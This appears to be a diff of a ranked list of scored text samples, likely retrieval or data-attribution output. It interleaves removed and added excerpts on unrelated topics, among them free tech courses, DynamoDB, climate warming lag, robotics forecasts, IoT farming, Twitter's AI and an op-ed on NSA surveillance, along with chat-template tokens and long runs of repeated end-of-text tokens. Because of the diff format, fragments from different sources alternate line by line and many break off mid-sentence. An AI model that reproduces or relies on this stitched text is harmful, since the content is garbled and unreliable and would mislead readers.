Hyperterminal, Putty from Windows or Linux. +Data products leverage data science to improve product performance. They rely on a virtuous cycle where products collect usage data that becomes the fodder for algorithms which in turn offer users a better experience. -Connecting to Samsung TV +What happens before you’ve collected that data? The first version of your product has to address what data science calls the “cold start” problem — it has to provide a "good enough" experience to initiate the virtuous cycle of data collection and data-driven improvement. It’s up to product managers and engineers to implement that good enough solution. -Put the TV into Standby Mode, press [Info] then [Menu] +For example, when an Instacart user visits the site, the application ================================================================================ -Rank = 82; Score = 2883584.0 -<|begin_of_text|>Campus-based technology courses can be expensive, which is why many people are choosing to take free technology courses online. Some of the best universities in the world offer free technology courses. Examples include Stanford University, the Massachusetts Institute of Technology and the Tokyo Institute of Technology. - -1. The Massachusetts Institute of Technology - -The Massachusetts Institute of Technology OpenCourseWare site is undoubtedly the best place to find free technology courses online. There are hundreds of courses to choose from, which means you can find a course on nearly any technology topic imaginable. +Rank = 84; Score = 1499136.0 +<|begin_of_text|>ADVERTISEMENT -2. Delft University of Technology +Earth's climate is changing rapidly. We know this from billions of observations, documented in thousands of journal papers and texts, and summarized every few years by the United Nations' Intergovernmental Panel on Climate Change. The primary cause of that change is the release of carbon dioxide from burning coal, oil, and natural gas. -The Delft University of Technology offers a number of free technology courses. Most of Delft's courses cover advanced topics that would be of interest to students in engineering or related fields. New courses are constantly being added to the site. +Negotiations about reducing emissions grind on. But in the meantime, how much warming are we already locked into? If we stop emitting greenhouse gases tomorrow, why would the temperature continue to rise? -3. University of California, Berkeley +The basics of carbon and climate -If you're looking for free technology courses that you can download to your MP3 player or computer, you'll definitely want to check out UC Berkeley on iTunes. Self-learners can gain access to a wide range of technology courses, lectures and events. Additional courses can be found though webcast.berkeley.edu. +The carbon dioxide that accumulates in the atmosphere insulates the surface of the Earth. It's like a warming blanket that holds in heat. This energy increases the Earth's surface average temperature, heats the oceans, and melts polar ice. As consequences, sea level rises and weather changes. -4. Stanford University +The Arctic is warming much faster than the average global temperature; ice in the Arctic Ocean is melting and the permafrost is thawing. Ice sheets in both the Arctic and Antarctic are melting. Ecosystems on both land and in the sea are changing. The observed changes are coherent and consistent with our theoretical understanding of the Earth's energy balance and simulations from models that are used to understand past variability and to help us think about the future. -Berkeley isn't the only university that makes free technology courses available through iTunes. Stanford University has a similar set-up through their Stanford iTunes project. There are quite a few technology courses and lectures that can be accessed for free already, and more are added on a weekly basis. +Slam on the climate brakes -5. Rice University +What would happen to the climate if we were to stop emitting carbon dioxide today, right now? Would we return to the climate of our elders? The simple answer is no. Once we release the carbon dioxide stored in the fossil fuels we burn, it accumulates in and moves amongst the atmosphere, the oceans, the land, and the plants and animals of the biosphere. The released carbon dioxide will remain in the atmosphere for thousands of years. Only after many millennia will it return to rocks, for example, through the formation of calcium carbonate — limestone — as marine organisms' shells settle to the bottom of the ocean. But on time spans relevant to humans, once released the carbon dioxide is in our environment essentially forever. It does not go away, unless we, ourselves, remove it. -Connexions, a Rice University organization, hosts a wide variety of scholarly content. The site offers hundreds of free technology courses. Some courses consist of small 'knowledge chunks.' Other courses include multiple modules, books and course notes. +If we stop emitting today, it's not the end of the story for global warming. There's a delay in temperature increase as the climate catches up with all the carbon that's in the atmosphere. After maybe 40 more years, the climate will stabilize at a temperature higher than what was normal for previous generations. -6. The Open University +This decades-long lag between cause and effect is due to the long time it takes to heat the the ocean's huge mass +================================================================================ +Rank = 85; Score = 1499136.0 +<|begin_of_text|>Editor's Note: This article was originally printed in the 2008 Scientific American Special Report on Robots. It is being published on the Web as part of ScientificAmerican.com's In-Depth Report on Robots. -There are more than 50 free technology courses that can be taken through The Open University's online LearningSpace. Courses range from the introductory level to the advanced level and take anywhere from two hours to two weeks to complete. +In recent years the mushrooming power, functionality and ubiquity of computers and the Internet have outstripped early forecasts about technology’s rate of advancement and usefulness in everyday life. Alert pundits now foresee a world saturated with powerful computer chips, which will increasingly insinuate themselves into our gadgets, dwellings, apparel and even our bodies. -7. Utah State University +Yet a closely related goal has remained stubbornly elusive. In stark contrast to the largely unanticipated explosion of computers into the mainstream, the entire endeavor of robotics has failed rather completely to live up to the predictions of the 1950s. In those days experts who were dazzled by the seemingly miraculous calculational ability of computers thought that if only the right software were written, computers could become the articial brains of sophisticated autonomous robots. Within a decade or two, they believed, such robots would be cleaning our oors, mowing our lawns and, in general, eliminating drudgery from our lives. -Self-learners around the world can choose from more than a dozen free technology courses when they visit Utah State University's OpenCourseWare site. Technology topics include, but are not limited to: online communities, instructional technology, interactive learning and computer engineering. +Obviously, it hasn’t turned out that way. It is true that industrial robots have transformed the manufacture of automobiles, among other products. But that kind of automation is a far cry from the versatile, mobile, autonomous creations that so many scientists and engineers have hoped for. In pursuit of such robots, waves of researchers have grown disheartened and scores of start-up companies have gone out of business. -8. University of Southern Queensland +It is not the mechanical “body” that is unattainable; articulated arms and other moving mechanisms adequate for manual work already exist, as the industrial robots attest. Rather it is the computer-based articial brain that is still well below the level of sophistication needed to build a humanlike robot. -The University of Southern Queensland offers two different courses that may be of interest to technology buffs. Both of the text-based courses are free and include materials that are practical for self-learners. +Nevertheless, I am convinced that the decades-old dream of a useful, general-purpose autonomous robot will be realized in the not too distant future. By 2010 we will see mobile robots as big as people but with cognitive abilities similar in many respects to those of a lizard. The machines will be capable of carrying out simple chores, such as vacuuming, dusting, delivering packages and taking out the garbage. By 2040, I believe, we will nally achieve the original goal of robotics and a thematic mainstay of science ction: a freely moving machine with the intellectual capabilities of a human being. -9. Dixie State College of Utah +Reasons for Optimism -The CIT Department at the +In light of what I have just described as ================================================================================ -Rank = 83; Score = 2883584.0 -<|begin_of_text|>💪 From the big boys - -Backchannel run a rare piece on how Apple uses machine learning. It states that a 200mb software package runs on the iPhone encompassing “app usage data, interactions with contacts, neural net processing, a speech modeler and a natural language event modeling system”. I’ve held the view for a while now that today’s AI techniques and infrastructure will re-open a class of historically intractable problems while also enabling us to rethink how products and features should be designed. Apple seem to think the same: “Machine learning is enabling us to say yes to some things that in past years we would have said no to. It’s becoming embedded in the process of deciding the products we’re going to do next.” - -, modestly called - -Salesforce announced their internal umbrella AI initiative, modestly called Einstein, which will go on to power many of the company’s cloud services, as well as expose AI tools to end users. The team of 175 data scientists includes talent from acquired startups MetaMind, PredictionIO and RelateIQ. The company’s flagship event, Dreamforce, will attract 170k people into SF next week. - -Six of the most powerful technology companies have set up the have set up the Partnership on AI as a non-profit aimed at advancing public understanding of AI and formulate best practices on the challenges and opportunities within the field. An important catalyst to this end will undoubtedly be the continuation of open source technology development, which Seldon’s founder articulates in this piece. - -🌎 On the importance and impact of AI on the World +Rank = 86; Score = 1499136.0 +<|begin_of_text|>Computer Vision has become ubiquitous in our society, with applications in search, image understanding, apps, mapping, medicine, drones, and self-driving cars. Core to many of these applications are visual recognition tasks such as image classification, localization and detection. Recent developments in neural network (aka “deep learning”) approaches have greatly advanced the performance of these state-of-the-art visual recognition systems. This course is a deep dive into details of the deep learning architectures with a focus on learning end-to-end models for these tasks, particularly image classification. During the 10-week course, students will learn to implement, train and debug their own neural networks and gain a detailed understanding of cutting-edge research in computer vision. The final assignment will involve training a multi-million parameter convolutional neural network and applying it on the largest image classification dataset (ImageNet). We will focus on teaching how to set up the problem of image recognition, the learning algorithms (e.g. backpropagation), practical engineering tricks for training and fine-tuning the networks and guide the students through hands-on assignments and a final course project. Much of the background and materials of this course will be drawn from the ImageNet Challenge<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 87; Score = 1499136.0 +<|begin_of_text|>IoT in agriculture – a way towards smart farming -Stanford’s 100 year study on AI published their first report. It finds “no cause for concern that AI is an imminent threat to humankind. No machines with self-sustaining long-term goals and intent have been developed, nor are they likely to be developed in the near future”. From a public policy perspective, it recommends to: +Share On: -Define a path toward accruing technical expertise in AI at all levels of government. +To many people, the term “IoT” or “Internet of Things” conjures images of latest gadgets like Google Glass, Apple Watch or even self-driving cars. In fact, some of the most innovative and practical applications are happening in the Industrial Internet of Things (IIoT) – smart cities, smart agriculture, smart factories, etc. However, the application of IoT in agriculture can have the greatest impact. -Remove the perceived and actual impediments to research on the fairness, security, privacy, and social impacts of AI systems. +The Internet of Things is transforming the agriculture industry like never before by empowering farmers and growers to deal with the enormous challenges they face. Till now, agriculture has been a high-risk, labor-intensive, low-reward industry. Farmers are very likely to be impacted by unexpected environmental changes, economic downturns, and many other risk factors. -Increase public and private funding for interdisciplinary studies of the societal impacts of AI. +How IoT can reshape farming -a16z’s Chris Dixon sets out 11 reasons to be excited about the future of technology with short soundbites for each. Five of these are either directly related to or will be enabled by AI and machine learning. +IoT can help farmers in a number of ways. At its most basic level, sensors can be deployed across farm and farming machineries in order to enable farmers to gain an abundance of insightful data, such as the temperature of stored produce, the amount of fertilizer used, the amount of water in the soil, the number of seeds planted, storage conditions, the status of farming equipment and machinery in use, etc. Once an IoT-enabled smart system is in place, farmers can easily track a variety of environmental variables and take informed decisions. -👍 User-friendly AI +Rather than just an enhancement, smart farming is a necessary innovation, which if correctly implemented could help farmers to deal with all the challenges they face in farming. Moreover, the rich insights derived from smart sensors could help farmers be more precise in their use of pesticides and fertilizers, thus mitigating some environmental impacts. -UC Berkeley announced a new Center for Human-Compatible AI to study how AI used for mission +IoT deployment in agriculture can address many challenges and increase the quality, quantity, and cost-effectiveness of agricultural production.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 84; Score = 2883584.0 -<|begin_of_text|>It may sound obvious, but the primary role of a data journalist is to analyze data. Whether the analysis is simple or complex, it is our capacity to do this well that makes us valuable in the newsroom. And yet, most of us are still doing it using old-fashioned, error-prone methods. Specifically, we use processes that are: - -inscrutable (R, numpy); - -difficult to replicate (Excel, Google Docs, OpenRefine); and +Rank = 88; Score = 1499136.0 +<|begin_of_text|>Are we on the verge of creating artificial intelligence capable of finding answers to the world’s most pressing challenges? After steady progress in basic AI tasks in recent years, this is the vision that some leading technologists have for AI. And yet, how we will make this grand leap is anyone’s guess. -wedded to tools that are complex or expensive ( SPSS, SAS, ArcGIS). +Eric Schmidt, the executive chairman of Alphabet (formerly Google), says AI could be harnessed to help solve major challenges, including climate change and food security. Speaking at an event convened in New York this week to discuss the opportunities and risks in AI, Schmidt offered no details on how the technology might be adapted for such complex and abstract problems. -As journalists, we not only need to solve these problems for practical reporting purposes, but also for philosophical ones. How can we assert that our numbers are correct if we performed a series of manual processes in a spreadsheet exactly once? Do it that way and the only record of how it was done is the one in your head. That’s not good enough. Journalistic integrity requires that we’re able to document and explain our processes. +Demis Hassabis, CEO of Google Deepmind, a division within Google doing groundbreaking work in machine learning, and which aims to bring about an “artificial general intelligence” (see “Google’s Intelligence Designer”), said the goal of this effort was to harness AI for grand challenges. “If we can solve intelligence in a general enough way, then we can apply it to all sorts of things to make the world a better place,” he said. -Meet agate +And the chief technology officer of Facebook, Mike Schroepfer, expressed similar hope. “The power of AI technology is it can solve problems that scale to the whole planet,” he said. -For the last year or so, I’ve challenged myself to design a better way of doing routine data analysis. It’s a problem with several parts, and today I’m thrilled to announce that the first and largest piece of the solution has reached version 1.0. It’s called agate, and it’s going to make your process better. I’ve been using agate in production for two months, and I will personally guarantee that it works. +Eric Schmidt -In greater depth, agate is a Python data analysis library in the vein of numpy or pandas, but with one crucial difference. Whereas those libraries optimize for the needs of scientists—namely, being incredibly fast when working with vast numerical datasets—agate instead optimizes for the performance of the human who is using it. That means stripping out those technical optimizations and instead focusing on designing code that is easy to learn, readable, and flexible enough to handle any weird data you throw at it. +A steady stream of advances—mostly enabled by the latest machine-learning techniques—are indeed empowering computers to do ever more things, from recognizing the contents of images to holding short text or voice conversations. These advances seem destined to change the way computers are used in many industries, but it’s far from clear how the industry will go from captioning images to tackling poverty and climate change. -(Love csvkit? agate is all the guts of csvkit, converted to a Python library and amped up a hundred times. Sorry, Ruby programmers—maybe you can steal some of the ideas for your own projects!) +In fact, speaking after his talk, Schroepfer was eager to limit expectations, at least in the short term. Schroepfer said that recent advances were not enough to allow machines to reach human levels of intelligence, and that two dozen or more “major breakthroughs” would be needed before this happened. And he said many people apparently had the wrong idea about how rapidly the field was moving. “People see one cool example, and then extrapolate from that,” he said. -Does focusing on human performance mean agate is slow? No: computers are very fast. Except in cases where the amount of data is truly huge (scientific research, financial systems), the optimizations that make these libraries complex, such as writing large parts of them in C, are unnecessary. They also make the libraries less flexible and more difficult to use. agate does away +The event, organized by New York University as well as companies leading the effort to harness artificial intelligence, including Facebook and Google, comes at a delicate moment for academic researchers and companies riding the wave of progress in AI. Progress seems certain to revolutionize many industries, perhaps with negative consequences, such as eradicating certain jobs (see “Who Will Own the Robots?”). It will surely also raise ================================================================================ -Rank = 85; Score = 2850816.0 -<|begin_of_text|>By Tanja Babic, PhD - -In the modern world, success of corporations is often driven by their employees and teams. Understanding how human behaviors affect the workplace is the main objective of industrial and organizational psychology, also known as I/O psychology. I/O psychologists study factors that promote motivation, team work and productivity, as well as management practices that improve employee’s performance. There are many industrial and organizational psychologists working towards improving working conditions, however, the following 30 people were chosen based on the following criteria: - -1. Publications: Majority of the individuals on this list have outstanding publication records. These publications include articles in scientific journals, books and book chapters. +Rank = 89; Score = 1490944.0 +<|begin_of_text|>Twitter today said it has begun to use artificial intelligence (A.I.) to recommend certain tweets in users' timelines. -2. Impact on industrial and organizational practices: Although academic research is an important aspect of psychology, its influence can only be assessed once ideas are put into practice and applied in a workplace. Men and women on this list have made a significant impact on modern practices and policies in a workplace. +The announcement comes a week after billionaire Mark Cuban told CNBC that he had recently begun buying Twitter stock because he believed "they finally got their act together with artificial intelligence." -3. Influence on future research directions: While many researchers have published important papers in the field of industrial and organizational psychology, priority was given to those who have made a substantial change in the way in which certain theories are viewed, or those who have led the way into novel research areas. +Facebook, Google, Microsoft, and other companies have previously attempted to improve various products using deep learning, a trendy type of A.I. Twitter has brought on people who are talented in this area through acquisitions of companies such as Magic Pony, and it has open-sourced some of its deep learning software. But the company has not been especially transparent about its progress. -4. Awards and recognitions: Most psychologists on this list have been recognized for their achievements by various international professional societies, foundations and even Queen Elizabeth II +A year ago Twitter introduced a so-called algorithmic timeline that ranked tweets based on relevance instead of them being in reverse chronological order. The feature is on by default, and users can opt out to revert to the classic timeline style. But Twitter has also introduced various widgets near the top of users' reverse-chronological timelines to show off tweets that it thinks users might like or might have missed.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 90; Score = 1490944.0 +<|begin_of_text|>“There will come a time when it isn't ‘They’re spying on me through my phone’ anymore. Eventually, it will be ‘My phone is spying on me.’” ― Philip K. Dick -1. Stanley Silverman +If ever Americans sell their birthright, it will be for the promise of expediency and comfort delivered by way of blazingly fast Internet, cell phone signals that never drop a call, thermostats that keep us at the perfect temperature without our having to raise a finger, and entertainment that can be simultaneously streamed to our TVs, tablets and cell phones. -Dr. Silverman is the dean of the Summit College and University College at the University of Akron. His area of expertise is the effect that arrogant bosses have on a workplace. He devised a new measure of arrogance called “Workplace Arrogance Scale,” which is used to determine whether managers possess arrogant tendencies. +Likewise, if ever we find ourselves in bondage, we will have only ourselves to blame for having forged the chains through our own lassitude, laziness and abject reliance on internet-connected gadgets and gizmos that render us wholly irrelevant. -2. Anita Woolley +Indeed, while most of us are consumed with our selfies and trying to keep up with what our so-called friends are posting on Facebook, the megacorporation Google has been busily partnering with the National Security Agency (NSA), the Pentagon, and other governmental agencies to develop a new “human” species, so to speak. -Just like individuals, teams possess a certain level of intelligence. This concept of “collective intelligence” is the focus of Dr. Woolley’s research. She is an assistant professor of organizational behavior and theory at the Tepper School of Business at Carnegie Mellon University. One of the most interesting findings of her recent research is that team intelligence is positively correlated with the number of women on the team. This study was published in the prestigious journal Science in 2010. +In other words, Google—a neural network that approximates a global brain—is fusing with the human mind in a phenomenon that is called “singularity,” and they’ve hired transhumanist scientist Ray Kurzweil to do just that. Google will know the answer to your question before you have asked it, Kurzweil said. “ It will have read every email you will ever have written, every document, every idle thought you’ve ever tapped into a search-engine box. It will know you better than your intimate partner does. Better, perhaps, than even yourself.” -3. David Rock +But here’s the catch: the NSA and all other government agencies will also know you better than yourself. As William Binney, one of the highest-level whistleblowers to ever emerge from the NSA said, “ The ultimate goal of the NSA is total population control.” -The Neuroleadership Institute was founded in order to bring together neuroscience and leadership experts and to enhance the science of leadership. The institute’s founder, Dr. David Rock, is the author of two business best-sellers and is a blogger for the Harvard Business Review, Fortune Magazine, Psychology Today and the Huffington Post. +Science fiction, thus, has become fact. +We’re fast approaching Philip K. Dick’s vision of the future as depicted in the film Minority Report. There, police agencies apprehend criminals before they can commit a crime, driverless cars populate the highways, and a person’s biometrics are constantly scanned and used to track their movements, target them for advertising, and keep them under perpetual surveillance. +Cue the dawning of the Age of the Internet of Things, in which internet-connected “things” will monitor your home, your health and your habits ================================================================================ -Rank = 86; Score = 2818048.0 -<|begin_of_text|>Developers all over the world are using Amazon DynamoDB to build applications that take advantage of its ability to provide consistent low-latency performance. The developers that I have talked to enjoy the flexibility provided by DynamoDB’s schemaless model, along with the ability to scale capacity up and down as needed. They also benefit from the DynamoDB Reserved Capacity model in situations where they are able to forecast their need for read and write throughput ahead of time. - -A little over a year ago we made DynamoDB more flexible by adding support for Global Secondary Indexes. This important feature moved DynamoDB far beyond its roots as a key-value store by allowing lookups on attributes other than the primary key. - -Today we are making Global Secondary Indexes even more flexible by giving you the ability to add and delete them from existing tables on the fly. +Rank = 91; Score = 1490944.0 +<|begin_of_text|>"MOND" redirects here. For other uses, see Mond -We are also making it easier for you to purchase Reserved Capacity directly from the AWS Management Console. As part of this change to a self-service model, you can now purchase more modest amounts of Reserved Capacity than ever before. +Modified Newtonian dynamics (MOND) is a theory that proposes a modification of Newton's laws to account for observed properties of galaxies. It is an alternative to the theory of dark matter in terms of explaining why galaxies do not appear to obey the currently understood laws of physics. -Let’s zoom in for a closer look! +Created in 1982 and first published in 1983 by Israeli physicist Mordehai Milgrom,[1] the theory's original motivation was to explain that the velocities of stars in galaxies were observed to be larger than expected based on Newtonian mechanics. Milgrom noted that this discrepancy could be resolved if the gravitational force experienced by a star in the outer regions of a galaxy was proportional to the square of its centripetal acceleration (as opposed to the centripetal acceleration itself, as in Newton's second law), or alternatively if gravitational force came to vary inversely with radius (as opposed to the inverse square of the radius, as in Newton's law of gravity). In MOND, violation of Newton's laws occurs at extremely small accelerations, characteristic of galaxies yet far below anything typically encountered in the Solar System or on Earth. 